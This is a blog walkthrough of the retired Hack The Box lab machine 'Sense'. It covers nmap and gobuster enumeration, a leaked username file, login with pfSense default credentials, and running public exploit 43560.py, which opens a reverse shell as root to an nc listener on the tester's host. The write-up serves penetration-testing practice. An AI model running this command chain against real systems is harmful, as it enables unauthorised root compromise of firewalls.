Sense

2020-02-16 00:00:00 +0000

sense

Sense is another straightforward retired HTB box. Its OSCP-like in that enumeration reveals a known vulnerability, and public exploit that enables us to compromise it.

Nmap scans first then…

nmap -sV -Pn --min-rate 10000 -p- 10.10.10.60 |tee -a sense.txt


PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Port 80 redirects us to the https port (443).

Gobuster is a great directory-brute forcer (like dirb and dirbuster) which is fast and easy to use.

when using it against https its often easiest to use the -k flag to avoid ssl/tls problems which could make the enumeration fail.

gobuster -u https://10.10.10.60/ -w /root/wordlists/SecLists/Discovery/Web-Content/common.txt -x .sh,.php,.asp -k Starting with a common.txt file to use with it, if nothing is found we could progress to something more comprehensive, but would take longer. You can also speed things up with increasing the threads that gobuster uses, 50 for example…with a -t 50 flag…but I didnt in this instance.


=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : https://10.10.10.60/
[+] Threads      : 10
[+] Wordlist     : /root/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,asp,sh
[+] Timeout      : 10s
=====================================================
2019/11/12 12:06:05 Starting gobuster
=====================================================
/classes (Status: 301)
/css (Status: 301)
/edit.php (Status: 200)
/exec.php (Status: 200)
/favicon.ico (Status: 200)
/graph.php (Status: 200)
/help.php (Status: 200)
/includes (Status: 301)
/index.html (Status: 200)
/index.php (Status: 200)
/index.php (Status: 200)
/installer (Status: 301)
/javascript (Status: 301)
/license.php (Status: 200)
/pkg.php (Status: 200)
/stats.php (Status: 200)
/status.php (Status: 200)
/system.php (Status: 200)
/themes (Status: 301)
/tree (Status: 301)
/widgets (Status: 301)
/xmlrpc.php (Status: 200)
/xmlrpc.php (Status: 200)
=====================================================
2019/11/12 12:09:26 Finished
=====================================================

Gobuster gives us a bunch of goodies to investigate, but nothing seems to give us any real progress; We can see that the server is using ‘pfsense’, but we cant login with any of the normal admin/admin creds or other weak variants. Searching online for default creds we find some (admin/pfsense), but they don’t work.

Perhaps we’re missing something, we tried gobuster with a limited common list initially, so we’ll try again with a better directory list. Dirbuster comes with a very reliable set of files to use, but I prefer to use them with gobuster.

gobuster -u https://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt -k -t 50

This takes a lot longer, and does return something more interesting /system-users.txt

browsing to the page we find a snippet of information which shouldn’t be publicly accessible…


####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We try to login again with username:rohit and password:pfsense, and sucessfully gain access to the pfsense dashboard.

We can search online, google, or the exploitdb website for known exploits, or just use searchsploit from the kali terminal…


root@kali:~/HTB/prep/sense# searchsploit pfsense 2.1.
------------------------------------------ ----------------------------------------
 Exploit Title                            |  Path
                                          | (/usr/share/exploitdb/)
------------------------------------------ ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.p | exploits/php/webapps/43560.py
------------------------------------------ ----------------------------------------
Shellcodes: No Result

Copy the exploit, read it carefully to find out how to use it, and what it does….then give it a try…

Dont forget to set an nc listener ready to catch the reverse shell…


root@kali:~/HTB/prep/sense# python3 pfsense.py --rhost 10.10.10.60 --lhost 10.10.14.34 --lport 6969 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed

The exploit works a treat, and gives us a lovely shell…


root@kali:~/HTB/prep/sense# nc -nlvp 6969
listening on [any] 6969 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.60] 2334
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
dxxxxxxxxxxxxxxxxxxxxxxxxxxxx6
# ls /home
.snap
rohit
# cat /home/rohit/user.txt
8xxxxxxxxxxxxxxxxxxxxxxxxxxxxb 
# hostname
pfSense.localdomain
# whoami
root
#

Flags are obfuscated because SPOILERS….(he says giving you a step-by-step !!!)

me

My name is sh1n0bi,Welcome to my blog! Im currently writing up some HTB walkthroughs

Posts: